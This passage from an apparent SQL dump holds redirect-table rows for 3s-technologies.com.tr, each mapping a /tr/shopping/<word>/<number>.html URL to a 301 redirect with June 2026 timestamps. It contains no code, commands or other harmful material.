00:00:00',301),(77094,'https://3s-technologies.com.tr/tr/shopping/paguma/959943514.html',NULL,'https://3s-technologies.com.tr/shopping/paguma/959943514.html','',1,0,'2026-06-11 09:39:30','0000-00-00 00:00:00',301),(77095,'https://3s-technologies.com.tr/tr/shopping/fellani/1264722483.html',NULL,'https://3s-technologies.com.tr/shopping/fellani/1264722483.html','',1,0,'2026-06-11 09:39:34','0000-00-00 00:00:00',301),(77096,'https://3s-technologies.com.tr/tr/shopping/sabella/3919737990.html',NULL,'https://3s-technologies.com.tr/shopping/sabella/3919737990.html','',1,0,'2026-06-11 09:39:37','0000-00-00 00:00:00',301),(77097,'https://3s-technologies.com.tr/tr/shopping/polyacid/1456103042.html',NULL,'https://3s-technologies.com.tr/shopping/polyacid/1456103042.html','',1,0,'2026-06-11 09:39:40','0000-00-00 00:00:00',301),(77098,'https://3s-technologies.com.tr/tr/shopping/resolutory/2191580889.html',NULL,'https://3s-technologies.com.tr/shopping/resolutory/2191580889.html','',1,0,'2026-06-11 09:39:43','0000-00-00 00:00:00',301),(77099,'https://3s-technologies.com.tr/tr/shopping/cincloramphus/3221854816.html',NULL,'https://3s-technologies.com.tr/shopping/cincloramphus/3221854816.html','',1,0,'2026-06-11 09:39:46','0000-00-00 00:00:00',301),(77100,'https://3s-technologies.com.tr/tr/shopping/agitpropist/3304632463.html',NULL,'https://3s-technologies.com.tr/shopping/agitpropist/3304632463.html','',1,0,'2026-06-11 09:39:49','0000-00-00 00:00:00',301),(77101,'https://3s-technologies.com.tr/tr/shopping/deathwatch/1819176536.html',NULL,'https://3s-technologies.com.tr/shopping/deathwatch/1819176536.html','',1,0,'2026-06-11 09:39:52','0000-00-00 00:00:00',301),(77102,'https://3s-technologies.com.tr/tr/shopping/peekaboo/666644180.html',NULL,'https://3s-technologies.com.tr/shopping/peekaboo/666644180.html','',1,0,'2026-06-11 09:39:57','0000-00-00 00:00:00',301),(77103,'https://3s-technologies.com.tr/tr/shopping/gagteeth/1549372237.html',NULL,'https://3s-technologies.com.tr/shopping/gagteeth/1549372237.html','',1,0,'2026-06-11 09:39:59','0000-00-00 00:00:00',301),(77104,'https://3s-technologies.com.tr/tr/shopping/triticin/2404471051.html',NULL,'https://3s-technologies.com.tr/shopping/triticin/2404471051.html','',1,0,'2026-06-11 09:40:02','0000-00-00 00:00:00',301),(77105,'https://3s-technologies.com.tr/tr/shopping/preservation/2508469951.html',NULL,'https://3s-technologies.com.tr/shopping/preservation/2508469951.html','',1,0,'2026-06-11 09:40:05','0000-00-00 00:00:00',301),(77106,'https://3s-technologies.com.tr/tr/shopping/trigynia/2568386209.html',NULL,'https://3s-technologies.com.tr/shopping/trigynia/2568386209.html','',1,0,'2026-06-11 09:40:08','0000-00-00 00:00:00',301),(77107,'https://3s-technologies.com.tr/tr/shopping/undeeded/1419052654.html',NULL,'https://3s-technologies.com.tr/shopping/undeeded/1419052654.html','',1,0,'2026-06-11 09:40:11','0000-00-00 00:00:00',301),(77108,'https://3s-technologies.com.tr/tr/shopping/synergetic/2035370280.html',NULL,'https://3s-technologies.com.tr/shopping/synergetic/2035370280.html','',1,0,'2026-06-11 09:40:14','0000-00-00 00:00:00',301),(77109,'https://3s-technologies.com.tr/tr/shopping/vulnific/165132785.html',NULL,'https://3s-technologies.com.tr/shopping/vulnific/165132785.html','',1,0,'2026-06-11 09:40:19','0000-00-00 00:00:00',301),(77110,'https://3s-technologies.com.tr/tr/shopping/pediceled/1929986371.html',NULL,'https://3s-technologies.com.tr/shopping/pediceled/1929986371.html','',1,0,'2026-06-11 09:40:24','0000-00-00 00:00:00',301),(77111,'https://3s-technologies.com.tr/tr/shopping/genoese/1860196412.html',NULL,'https://3s-technologies.com.tr/shopping/genoese/1860196412.html','',1,0,'2026-06-11 09:40:27','0000-00-00 00:00:00',301),(77112,'https://3s-technologies.com.tr/tr/shopping/remberge/3584914423.html',NULL,'https://3s-technologies.com.tr/shopping/remberge/3584914423.html','',1,0,'2026-06-11 09:40:30','0000-00-00 00:00:00',301),(77113,'https://3s-technologies.com.tr/tr/shopping/hypothetist/1349174234.html',NULL,'https://3s-technologies.com.tr/shopping/hypothetist/1349174234.html','',1,0,'2026-06-11 09:40:33','0000-00-00 00:00:00',301),(77114,'https://3s-technologies.com.tr/tr/shopping/anomala/1744633942.html',NULL,'https://3s-technologies.com.tr/shopping/anomala/1744633942.html','',1,0,'2026-06-11 09:40:35','0000-00-00 00:00:00',301),(77115,'https://3s-technologies.com.tr/tr/shopping/frenzical/2084960567.html',NULL,'https://3s-technologies.com.tr/shopping/frenzical/2084960567.html','',1,0,'2026-06-11 09:40:39','0000-00-00 00:00:00',301),(77116,'https://3s-technologies.com.tr/tr/shopping/intreat/4026082906.html',NULL,'https://3s-technologies.com.tr/shopping/intreat/4026082906.html','',1,0,'2026-06-11 09:40:42','0000-00-00 00:00:00',301),(77117,'https://3s-technologies.com.tr/tr/shopping/confirmee/779210419.html',NULL,'https://3s-technologies.com.tr/shopping/confirmee/779210419.html','',1,0,'2026-06-11 09:40:45','0000-00-00 00:00:00',301),(77118,'https://3s-technologies.com.tr/tr/shopping/tampered/610946626.html',NULL,'https://3s-technologies.com.tr/shopping/tampered/610946626.html','',1,0,'2026-06-11 09:40:48','0000-00-00 00:00:00',301),(77119,'https://3s-technologies.com.tr/tr/shopping/resplendence/2150397522.html',NULL,'https://3s-technologies.com.tr/shopping/resplendence/2150397522.html','',1,0,'2026-06-11 09:40:51','0000-00-00 00:00:00',301),(77120,'https://3s-technologies.com.tr/tr/shopping/sterculia/3403737166.html',NULL,'https://3s-technologies.com.tr/shopping/sterculia/3403737166.html','',1,0,'2026-06-11 09:40:54','0000-00-00 00:00:00',301),(77121,'https://3s-technologies.com.tr/tr/shopping/surseance/1129591210.html',NULL,'https://3s-technologies.com.tr/shopping/surseance/1129591210.html','',1,0,'2026-06-11 09:40:57','0000-00-00 00:00:00',301),(77122,'https://3s-technologies.com.tr/tr/shopping/mesoxalic/55021274.html',NULL,'https://3s-technologies.com.tr/shopping/mesoxalic/55021274.html','',1,0,'2026-06-11 09:41:00','0000-00-00 00:00:00',301),(77123,'https://3s-technologies.com.tr/tr/shopping/chantey/899966611.html',NULL,'https://3s-technologies.com.tr/shopping/chantey/899966611.html','',1,0,'2026-06-11 09:41:04','0000-00-00 00:00:00',301),(77124,'https://3s-technologies.com.tr/tr/shopping/cockade/1499093506.html',NULL,'https://3s-technologies.com.tr/shopping/cockade/1499093506.html','',1,0,'2026-06-11 09:41:06','0000-00-00 00:00:00',301),(77125,'https://3s-technologies.com.tr/tr/shopping/importunate/2655619651.html',NULL,'https://3s-technologies.com.tr/shopping/importunate/2655619651.html','',1,0,'2026-06-11 09:41:09','0000-00-00 00:00:00',301),(77126,'https://3s-technologies.com.tr/tr/shopping/deuteroscopy/3742872359.html',NULL,'https://3s-technologies.com.tr/shopping/deuteroscopy/3742872359.html','',1,0,'2026-06-11 09:41:12','0000-00-00 00:00:00',301),(77127,'https://3s-technologies.com.tr/tr/shopping/tutenag/2302602178.html',NULL,'https://3s-technologies.com.tr/shopping/tutenag/2302602178.html','',1,0,'2026-06-11 09:41:15','0000-00-00 00:00:00',301),(77128,'https://3s-technologies.com.tr/tr/shopping/diacoustics/3883080551.html',NULL,'https://3s-technologies.com.tr/shopping/diacoustics/3883080551.html','',1,0,'2026-06-11 09:41:18','0000-00-00 00:00:00',301),(77129,'https://3s-technologies.com.tr/tr/shopping/tremulant/3240888105.html',NULL,'https://3s-technologies.com.tr/shopping/tremulant/3240888105.html','',1,0,'2026-06-11 09:41:21','0000-00-00 00:00:00',301),(77130,'https://3s-technologies.com.tr/tr/shopping/teazehole/1717194041.html',NULL,'https://3s-technologies.com.tr/shopping/teazehole/1717194041.html','',1,0,'2026-06-11 09:41:24','0000-00-00 00:00:00',301),(77131,'https://3s-technologies.com.tr/tr/shopping/latinism/1465873385.html',NULL,'https://3s-technologies.com.tr/shopping/latinism/1465873385.html','',1,0,'2026-06-11 09:41:27','0000-00-00 00:00:00',301),(77132,'https://3s-technologies.com.tr/tr/shopping/hanselines/1422429343.html',NULL,'https://3s-technologies.com.tr/shopping/hanselines/1422429343.html','',1,0,'2026-06-11 09:41:30','0000-00-00 00:00:00',301),(77133,'https://3s-technologies.com.tr/tr/shopping/armistice/3759041368.html',NULL,'https://3s-technologies.com.tr/shopping/armistice/3759041368.html','',1,0,'2026-06-11 09:41:33','0000-00-00 00:00:00',301),(77134,'https://3s-technologies.com.tr/tr/shopping/tetrandrian/2011491274.html',NULL,'https://3s-technologies.com.tr/shopping/tetrandrian/2011491274.html','',1,0,'2026-06-11 09:41:36','0000-00-00 00:00:00',301),(77135,'https://3s-technologies.com.tr/tr/shopping/vaingloriously/2191278568.html',NULL,'https://3s-technologies.com.tr/shopping/vaingloriously/2191278568.html','',1,0,'2026-06-11 09:41:39','0000-00-00 00:00:00',301),(77136,'https://3s-technologies.com.tr/tr/shopping/ouvarovite/1670980459.html',NULL,'https://3s-technologies.com.tr/shopping/ouvarovite/1670980459.html','',1,0,'2026-06-11 09:41:42','0000-00-00 00:00:00',301),(77137,'https://3s-technologies.com.tr/tr/shopping/mexicana/722141302.html',NULL,'https://3s-technologies.com.tr/shopping/mexicana/722141302.html','',1,0,'2026-06-11 09:41:45','0000-00-00 00:00:00',301),(77138,'https://3s-technologies.com.tr/tr/shopping/eerisome/1197967477.html',NULL,'https://3s-technologies.com.tr/shopping/eerisome/1197967477.html','',1,0,'2026-06-11 09:41:49','0000-00-00 00:00:00',301),(77139,'https://3s-technologies.com.tr/tr/shopping/gruel/1371626957.html',NULL,'https://3s-technologies.com.tr/shopping/gruel/1371626957.html','',1,0,'2026-06-11 09:41:51','0000-00-00 00:00:00',301),(77140,'https://3s-technologies.com.tr/tr/shopping/coccyzus/3562226849.html',NULL,'https://3s-technologies.com.tr/shopping/coccyzus/3562226849.html','',1,0,'2026-06-11 09:41:55','0000-00-00 00:00:00',301),(77141,'https://3s-technologies.com.tr/tr/shopping/talismanic/3357372196.html',NULL,'https://3s-technologies.com.tr/shopping/talismanic/3357372196.html','',1,0,'2026-06-11 09:41:58','0000-00-00 00:00:00',301),(77142,'https://3s-technologies.com.tr/tr/shopping/saltimbanco/601990076.html',NULL,'https://3s-technologies.com.tr/shopping/saltimbanco/601990076.html','',1,0,'2026-06-11 09:42:00','0000-00-00 00:00:00',301),(77143,'https://3s-technologies.com.tr/tr/shopping/heraldic/377144531.html',NULL,'https://3s-technologies.com.tr/shopping/heraldic/377144531.html','',1,0,'2026-06-11 09:42:04','0000-00-00 00:00:00',301),(77144,'https://3s-technologies.com.tr/tr/shopping/blowse/1987826468.html',NULL,'https://3s-technologies.com.tr/shopping/blowse/1987826468.html','',1,0,'2026-06-11 09:42:07','0000-00-00 00:00:00',301),(77145,'https://3s-technologies.com.tr/tr/shopping/vermiparous/3944439205.html',NULL,'https://3s-technologies.com.tr/shopping/vermiparous/3944439205.html','',1,0,'2026-06-11 09:42:10','0000-00-00 00:00:00',301),(77146,'https://3s-technologies.com.tr/tr/shopping/trundle/2419155381.html',NULL,'https://3s-technologies.com.tr/shopping/trundle/2419155381.html','',1,0,'2026-06-11 09:42:12','0000-00-00 00:00:00',301),(77147,'https://3s-technologies.com.tr/tr/shopping/iulidae/2494146228.html',NULL,'https://3s-technologies.com.tr/shopping/iulidae/2494146228.html','',1,0,'2026-06-11 09:42:15','0000-00-00 00:00:00',301),(77148,'https://3s-technologies.com.tr/tr/shopping/foryetten/3888682491.html',NULL,'https://3s-technologies.com.tr/shopping/foryetten/3888682491.html','',1,0,'2026-06-11 09:42:18','0000-00-00 00:00:00',301),(77149,'https://3s-technologies.com.tr/tr/shopping/debilitant/2887395954.html',NULL,'https://3s-technologies.com.tr/shopping/debilitant/2887395954.html','',1,0,'2026-06-11 09:42:22','0000-00-00 00:00:00',301),(77150,'https://3s-technologies.com.tr/tr/shopping/cunila/3024983529.html',NULL,'https://3s-technologies.com.tr/shopping/cunila/3024983529.html','',1,0,'2026-06-11 09:42:25','0000-00-00 00:00:00',301),(77151,'https://3s-technologies.com.tr/tr/shopping/crumenal/1597043669.html',NULL,'https://3s-technologies.com.tr/shopping/crumenal/1597043669.html','',1,0,'2026-06-11 09:42:28','0000-00-00 00:00:00',301),(77152,'https://3s-technologies.com.tr/tr/shopping/incrassative/1375402036.html',NULL,'https://3s-technologies.com.tr/shopping/incrassative/1375402036.html','',1,0,'2026-06-11 09:42:30','0000-00-00 00:00:00',301),(77153,'https://3s-technologies.com.tr/tr/shopping/disassimilative/1584945213.html',NULL,'https://3s-technologies.com.tr/shopping/disassimilative/1584945213.html','',1,0,'2026-06-11 09:42:35','0000-00-00 00:00:00',301),(77154,'https://3s-technologies.com.tr/tr/shopping/pharisaicalness/1216526130.html',NULL,'https://3s-technologies.com.tr/shopping/pharisaicalness/1216526130.html','',1,0,'2026-06-11 09:42:38','0000-00-00 00:00:00',301),(77155,'https://3s-technologies.com.tr/tr/shopping/discreeter/1953149516.html',NULL,'https://3s-technologies.com.tr/shopping/discreeter/1953149516.html','',1,0,'2026-06-11 09:42:45','0000-00-00 00:00:00',301),(77156,'https://3s-technologies.com.tr/tr/shopping/spelaea/2417254838.html',NULL,'https://3s-technologies.com.tr/shopping/spelaea/2417254838.html','',1,0,'2026-06-11 09:42:47','0000-00-00 00:00:00',301),(77157,'https://3s-technologies.com.tr/tr/shopping/lemurine/3713996278.html',NULL,'https://3s-technologies.com.tr/shopping/lemurine/3713996278.html','',1,0,'2026-06-11 09:42:50','0000-00-00 00:00:00',301),(77158,'https://3s-technologies.com.tr/tr/shopping/toupettit/1461284597.html',NULL,'https://3s-technologies.com.tr/shopping/toupettit/1461284597.html','',1,0,'2026-06-11 09:42:53','0000-00-00 00:00:00',301),(77159,'https://3s-technologies.com.tr/tr/shopping/enricher/973090578.html',NULL,'https://3s-technologies.com.tr/shopping/enricher/973090578.html','',1,0,'2026-06-11 09:42:56','0000-00-00 00:00:00',301),(77160,'https://3s-technologies.com.tr/tr/shopping/menticirrus/781133333.html',NULL,'https://3s-technologies.com.tr/shopping/menticirrus/781133333.html','',1,0,'2026-06-11 09:42:59','0000-00-00 00:00:00',301),(77161,'https://3s-technologies.com.tr/tr/shopping/megampere/2019260481.html',NULL,'https://3s-technologies.com.tr/shopping/megampere/2019260481.html','',1,0,'2026-06-11 09:43:02','0000-00-00 00:00:00',301),(77162,'https://3s-technologies.com.tr/tr/shopping/discloak/1502530824.html',NULL,'https://3s-technologies.com.tr/shopping/discloak/1502530824.html','',1,0,'2026-06-11 09:43:05','0000-00-00 00:00:00',301),(77163,'https://3s-technologies.com.tr/tr/shopping/hortulan/571698391.html',NULL,'https://3s-technologies.com.tr/shopping/hortulan/571698391.html','',1,0,'2026-06-11 09:43:08','0000-00-00 00:00:00',301),(77164,'https://3s-technologies.com.tr/tr/shopping/demobilization/257257336.html',NULL,'https://3s-technologies.com.tr/shopping/demobilization/257257336.html','',1,0,'2026-06-11 09:43:11','0000-00-00 00:00:00',301),(77165,'https://3s-technologies.com.tr/tr/shopping/mythe/1647315637.html',NULL,'https://3s-technologies.com.tr/shopping/mythe/1647315637.html','',1,0,'2026-06-11 09:43:17','0000-00-00 00:00:00',301),(77166,'https://3s-technologies.com.tr/tr/shopping/transuding/2978245026.html',NULL,'https://3s-technologies.com.tr/shopping/transuding/2978245026.html','',1,0,'2026-06-11 09:43:19','0000-00-00 00:00:00',301),(77167,'https://3s-technologies.com.tr/tr/shopping/spongiole/2055149548.html',NULL,'https://3s-technologies.com.tr/shopping/spongiole/2055149548.html','',1,0,'2026-06-11 09:43:22','0000-00-00 00:00:00',301),(77168,'https://3s-technologies.com.tr/tr/shopping/inconvertible/2591705657.html',NULL,'https://3s-technologies.com.tr/shopping/inconvertible/2591705657.html','',1,0,'2026-06-11 09:43:25','0000-00-00 00:00:00',301),(77169,'https://3s-technologies.com.tr/tr/shopping/anarchic/1279426988.html',NULL,'https://3s-technologies.com.tr/shopping/anarchic/1279426988.html','',1,0,'2026-06-11 09:43:28','0000-00-00 00:00:00',301),(77170,'https://3s-technologies.com.tr/tr/shopping/depilate/3875904042.html',NULL,'https://3s-technologies.com.tr/shopping/depilate/3875904042.html','',1,0,'2026-06-11 09:43:31','0000-00-00 00:00:00',301),(77171,'https://3s-technologies.com.tr/tr/shopping/hallway/982220531.html',NULL,'https://3s-technologies.com.tr/shopping/hallway/982220531.html','',1,0,'2026-06-11 09:43:35','0000-00-00 00:00:00',301),(77172,'https://3s-technologies.com.tr/tr/shopping/legislatress/481978794.html',NULL,'https://3s-technologies.com.tr/shopping/legislatress/481978794.html','',1,0,'2026-06-11 09:43:37','0000-00-00 00:00:00',301),(77173,'https://3s-technologies.com.tr/tr/shopping/necrobiotic/799196215.html',NULL,'https://3s-technologies.com.tr/shopping/necrobiotic/799196215.html','',1,0,'2026-06-11 09:43:40','0000-00-00 00:00:00',301),(77174,'https://3s-technologies.com.tr/tr/shopping/incumbently/379996315.html',NULL,'https://3s-technologies.com.tr/shopping/incumbently/379996315.html','',1,0,'2026-06-11 09:43:43','0000-00-00 00:00:00',301),(77175,'https://3s-technologies.com.tr/tr/shopping/vapor/3599870004.html',NULL,'https://3s-technologies.com.tr/shopping/vapor/3599870004.html','',1,0,'2026-06-11 09:43:48','0000-00-00 00:00:00',301),(77176,'https://3s-technologies.com.tr/tr/shopping/solifidianism/3122542974.html',NULL,'https://3s-technologies.com.tr/shopping/solifidianism/3122542974.html','',1,0,'2026-06-11 09:43:51','0000-00-00 00:00:00',301),(77177,'https://3s-technologies.com.tr/tr/shopping/semidiurnal/187240134.html',NULL,'https://3s-technologies.com.tr/shopping/semidiurnal/187240134.html','',1,0,'2026-06-11 09:43:54','0000-00-00 00:00:00',301),(77178,'https://3s-technologies.com.tr/tr/shopping/ubiquity/629859121.html',NULL,'https://3s-technologies.com.tr/shopping/ubiquity/629859121.html','',1,0,'2026-06-11 09:43:57','0000-00-00 00:00:00',301),(77179,'https://3s-technologies.com.tr/tr/shopping/darwinianism/679909359.html',NULL,'https://3s-technologies.com.tr/shopping/darwinianism/679909359.html','',1,0,'2026-06-11 09:44:00','0000-00-00 00:00:00',301),(77180,'https://3s-technologies.com.tr/tr/shopping/megakaryocyte/677744769.html',NULL,'https://3s-technologies.com.tr/shopping/megakaryocyte/677744769.html','',1,0,'2026-06-11 09:44:03','0000-00-00 00:00:00',301),(77181,'https://3s-technologies.com.tr/tr/shopping/cerebel/4250683570.html',NULL,'https://3s-technologies.com.tr/shopping/cerebel/4250683570.html','',1,0,'2026-06-11 09:44:06','0000-00-00 00:00:00',301),(77182,'https://3s-technologies.com.tr/tr/shopping/diurna/1698722989.html',NULL,'https://3s-technologies.com.tr/shopping/diurna/1698722989.html','',1,0,'2026-06-11 09:44:09','0000-00-00 00:00:00',301),(77183,'https://3s-technologies.com.tr/tr/shopping/herschel/4265777949.html',NULL,'https://3s-technologies.com.tr/shopping/herschel/4265777949.html','',1,0,'2026-06-11 09:44:12','0000-00-00 00:00:00',301),(77184,'https://3s-technologies.com.tr/tr/shopping/owelty/1053311034.html',NULL,'https://3s-technologies.com.tr/shopping/owelty/1053311034.html','',1,0,'2026-06-11 09:44:15','0000-00-00 00:00:00',301),(77185,'https://3s-technologies.com.tr/tr/shopping/onomatechny/1391569716.html',NULL,'https://3s-technologies.com.tr/shopping/onomatechny/1391569716.html','',1,0,'2026-06-11 09:44:19','0000-00-00 00:00:00',301),(77186,'https://3s-technologies.com.tr/tr/shopping/ensigncies/292901639.html',NULL,'https://3s-technologies.com.tr/shopping/ensigncies/292901639.html','',1,0,'2026-06-11 09:44:21','0000-00-00 00:00:00',301),(77187,'https://3s-technologies.com.tr/tr/shopping/coquille/2886183855.html',NULL,'https://3s-technologies.com.tr/shopping/coquille/2886183855.html','',1,0,'2026-06-11 09:44:24','0000-00-00 00:00:00',301),(77188,'https://3s-technologies.com.tr/tr/shopping/trevet/1650916510.html',NULL,'https://3s-technologies.com.tr/shopping/trevet/1650916510.html','',1,0,'2026-06-11 09:44:27','0000-00-00 00:00:00',301),(77189,'https://3s-technologies.com.tr/tr/shopping/surgeful/672992442.html',NULL,'https://3s-technologies.com.tr/shopping/surgeful/672992442.html','',1,0,'2026-06-11 09:44:31','0000-00-00 00:00:00',301),(77190,'https://3s-technologies.com.tr/tr/shopping/umbraculiferous/2843606538.html',NULL,'https://3s-technologies.com.tr/shopping/umbraculiferous/2843606538.html','',1,0,'2026-06-11 09:44:34','0000-00-00 00:00:00',301),(77191,'https://3s-technologies.com.tr/tr/shopping/imperturbably/1792784903.html',NULL,'https://3s-technologies.com.tr/shopping/imperturbably/1792784903.html','',1,0,'2026-06-11 09:44:36','0000-00-00 00:00:00',301),(77192,'https://3s-technologies.com.tr/tr/shopping/greedier/3164867113.html',NULL,'https://3s-technologies.com.tr/shopping/greedier/3164867113.html','',1,0,'2026-06-11 09:44:40','0000-00-00 00:00:00',301),(77193,'https://3s-technologies.com.tr/tr/shopping/abortive/1433121339.html',NULL,'https://3s-technologies.com.tr/shopping/abortive/1433121339.html','',1,0,'2026-06-11 09:44:42','0000-00-00 00:00:00',301),(77194,'https://3s-technologies.com.tr/tr/shopping/cucumis/3810838610.html',NULL,'https://3s-technologies.com.tr/shopping/cucumis/3810838610.html','',1,0,'2026-06-11 09:44:45','0000-00-00 00:00:00',301),(77195,'https://3s-technologies.com.tr/tr/shopping/cliquishness/140394662.html',NULL,'https://3s-technologies.com.tr/shopping/cliquishness/140394662.html','',1,0,'2026-06-11 09:44:50','0000-00-00 00:00:00',301),(77196,'https://3s-technologies.com.tr/tr/shopping/enwombed/2663809312.html',NULL,'https://3s-technologies.com.tr/shopping/enwombed/2663809312.html','',1,0,'2026-06-11 09:44:53','0000-00-00 00:00:00',301),(77197,'https://3s-technologies.com.tr/tr/shopping/tapayaxin/1350525147.html',NULL,'https://3s-technologies.com.tr/shopping/tapayaxin/1350525147.html','',1,0,'2026-06-11 09:44:55','0000-00-00 00:00:00',301),(77198,'https://3s-technologies.com.tr/tr/shopping/gymnocyte/3635514307.html',NULL,'https://3s-technologies.com.tr/shopping/gymnocyte/3635514307.html','',1,0,'2026-06-11 09:44:58','0000-00-00 00:00:00',301),(77199,'https://3s-technologies.com.tr/tr/shopping/maudlinwort/3887730000.html',NULL,'https://3s-technologies.com.tr/shopping/maudlinwort/3887730000.html','',1,0,'2026-06-11 09:45:01','0000-00-00 00:00:00',301),(77200,'https://3s-technologies.com.tr/tr/shopping/lechatelierite/3681261753.html',NULL,'https://3s-technologies.com.tr/shopping/lechatelierite/3681261753.html','',1,0,'2026-06-11 09:45:04','0000-00-00 00:00:00',301),(77201,'https://3s-technologies.com.tr/tr/shopping/cocaine/1972696649.html',NULL,'https://3s-technologies.com.tr/shopping/cocaine/1972696649.html','',1,0,'2026-06-11 09:45:07','0000-00-00 00:00:00',301),(77202,'https://3s-technologies.com.tr/tr/shopping/obligor/3847662615.html',NULL,'https://3s-technologies.com.tr/shopping/obligor/3847662615.html','',1,0,'2026-06-11 09:45:10','0000-00-00 00:00:00',301),(77203,'https://3s-technologies.com.tr/tr/shopping/domesticating/2898823490.html',NULL,'https://3s-technologies.com.tr/shopping/domesticating/2898823490.html','',1,0,'2026-06-11 09:45:13','0000-00-00 00:00:00',301),(77204,'https://3s-technologies.com.tr/tr/shopping/eukaryotic/2074062043.html',NULL,'https://3s-technologies.com.tr/shopping/eukaryotic/2074062043.html','',1,0,'2026-06-11 09:45:16','0000-00-00 00:00:00',301),(77205,'https://3s-technologies.com.tr/tr/shopping/sanation/1072794861.html',NULL,'https://3s-technologies.com.tr/shopping/sanation/1072794861.html','',1,0,'2026-06-11 09:45:20','0000-00-00 00:00:00',301),(77206,'https://3s-technologies.com.tr/tr/shopping/stencilling/1628887298.html',NULL,'https://3s-technologies.com.tr/shopping/stencilling/1628887298.html','',1,0,'2026-06-11 09:45:22','0000-00-00 00:00:00',301),(77207,'https://3s-technologies.com.tr/tr/shopping/pieno/2329840336.html',NULL,'https://3s-technologies.com.tr/shopping/pieno/2329840336.html','',1,0,'2026-06-11 09:45:25','0000-00-00 00:00:00',301),(77208,'https://3s-technologies.com.tr/tr/shopping/underpoise/435765212.html',NULL,'https://3s-technologies.com.tr/shopping/underpoise/435765212.html','',1,0,'2026-06-11 09:45:28','0000-00-00 00:00:00',301),(77209,'https://3s-technologies.com.tr/tr/shopping/tarditation/1208475267.html',NULL,'https://3s-technologies.com.tr/shopping/tarditation/1208475267.html','',1,0,'2026-06-11 09:45:32','0000-00-00 00:00:00',301),(77210,'https://3s-technologies.com.tr/tr/shopping/lordliness/2273935421.html',NULL,'https://3s-technologies.com.tr/shopping/lordliness/2273935421.html','',1,0,'2026-06-11 09:45:34','0000-00-00 00:00:00',301),(77211,'https://3s-technologies.com.tr/tr/shopping/unconscionable/503416081.html',NULL,'https://3s-technologies.com.tr/shopping/unconscionable/503416081.html','',1,0,'2026-06-11 09:45:37','0000-00-00 00:00:00',301),(77212,'https://3s-technologies.com.tr/tr/shopping/invertebrates/3831343986.html',NULL,'https://3s-technologies.com.tr/shopping/invertebrates/3831343986.html','',1,0,'2026-06-11 09:45:40','0000-00-00 00:00:00',301),(77213,'https://3s-technologies.com.tr/tr/shopping/corydalis/3846075486.html',NULL,'https://3s-technologies.com.tr/shopping/corydalis/3846075486.html','',1,0,'2026-06-11 09:45:43','0000-00-00 00:00:00',301),(77214,'https://3s-technologies.com.tr/tr/shopping/omiletical/1445887589.html',NULL,'https://3s-technologies.com.tr/shopping/omiletical/1445887589.html','',1,0,'2026-06-11 09:45:46','0000-00-00 00:00:00',301),(77215,'https://3s-technologies.com.tr/tr/shopping/bonchretien/950541770.html',NULL,'https://3s-technologies.com.tr/shopping/bonchretien/950541770.html','',1,0,'2026-06-11 09:45:52','0000-00-00 00:00:00',301),(77216,'https://3s-technologies.com.tr/tr/shopping/unguentous/319852830.html',NULL,'https://3s-technologies.com.tr/shopping/unguentous/319852830.html','',1,0,'2026-06-11 09:45:55','0000-00-00 00:00:00',301),(77217,'https://3s-technologies.com.tr/tr/shopping/isopepsin/4022446625.html',NULL,'https://3s-technologies.com.tr/shopping/isopepsin/4022446625.html','',1,0,'2026-06-11 09:45:58','0000-00-00 00:00:00',301),(77218,'https://3s-technologies.com.tr/tr/shopping/alacrity/3927691300.html',NULL,'https://3s-technologies.com.tr/shopping/alacrity/3927691300.html','',1,0,'2026-06-11 09:46:01','0000-00-00 00:00:00',301),(77219,'https://3s-technologies.com.tr/tr/shopping/inappropriateness/703833773.html',NULL,'https://3s-technologies.com.tr/shopping/inappropriateness/703833773.html','',1,0,'2026-06-11 09:46:04','0000-00-00 00:00:00',301),(77220,'https://3s-technologies.com.tr/tr/shopping/melipoma/3244264794.html',NULL,'https://3s-technologies.com.tr/shopping/melipoma/3244264794.html','',1,0,'2026-06-11 09:46:07','0000-00-00 00:00:00',301),(77221,'https://3s-technologies.com.tr/tr/shopping/broadmouth/2491722046.html',NULL,'https://3s-technologies.com.tr/shopping/broadmouth/2491722046.html','',1,0,'2026-06-11 09:46:10','0000-00-00 00:00:00',301),(77222,'https://3s-technologies.com.tr/tr/shopping/villany/3525239289.html',NULL,'https://3s-technologies.com.tr/shopping/villany/3525239289.html','',1,0,'2026-06-11 09:46:13','0000-00-00 00:00:00',301),(77223,'https://3s-technologies.com.tr/tr/shopping/prelature/1446960890.html',NULL,'https://3s-technologies.com.tr/shopping/prelature/1446960890.html','',1,0,'2026-06-11 09:46:16','0000-00-00 00:00:00',301),(77224,'https://3s-technologies.com.tr/tr/shopping/uncastle/3527567402.html',NULL,'https://3s-technologies.com.tr/shopping/uncastle/3527567402.html','',1,0,'2026-06-11 09:46:19','0000-00-00 00:00:00',301),(77225,'https://3s-technologies.com.tr/tr/shopping/graptolites/1457315125.html',NULL,'https://3s-technologies.com.tr/shopping/graptolites/1457315125.html','',1,0,'2026-06-11 09:46:22','0000-00-00 00:00:00',301),(77226,'https://3s-technologies.com.tr/tr/shopping/rememorative/3524165988.html',NULL,'https://3s-technologies.com.tr/shopping/rememorative/3524165988.html','',1,0,'2026-06-11 09:46:25','0000-00-00 00:00:00',301),(77227,'https://3s-technologies.com.tr/tr/shopping/crimsoned/1906194934.html',NULL,'https://3s-technologies.com.tr/shopping/crimsoned/1906194934.html','',1,0,'2026-06-11 09:46:28','0000-00-00 00:00:00',301),(77228,'https://3s-technologies.com.tr/tr/shopping/matriarchate/767747751.html',NULL,'https://3s-technologies.com.tr/shopping/matriarchate/767747751.html','',1,0,'2026-06-11 09:46:31','0000-00-00 00:00:00',301),(77229,'https://3s-technologies.com.tr/tr/shopping/canariense/3952568221.html',NULL,'https://3s-technologies.com.tr/shopping/canariense/3952568221.html','',1,0,'2026-06-11 09:46:34','0000-00-00 00:00:00',301),(77230,'https://3s-technologies.com.tr/tr/shopping/department/394320006.html',NULL,'https://3s-technologies.com.tr/shopping/department/394320006.html','',1,0,'2026-06-11 09:46:37','0000-00-00 00:00:00',301),(77231,'https://3s-technologies.com.tr/tr/shopping/myosis/4229407522.html',NULL,'https://3s-technologies.com.tr/shopping/myosis/4229407522.html','',1,0,'2026-06-11 09:46:40','0000-00-00 00:00:00',301),(77232,'https://3s-technologies.com.tr/tr/shopping/hydrometallurgical/521786571.html',NULL,'https://3s-technologies.com.tr/shopping/hydrometallurgical/521786571.html','',1,0,'2026-06-11 09:46:43','0000-00-00 00:00:00',301),(77233,'https://3s-technologies.com.tr/tr/shopping/sitten/2003362290.html',NULL,'https://3s-technologies.com.tr/shopping/sitten/2003362290.html','',1,0,'2026-06-11 09:46:47','0000-00-00 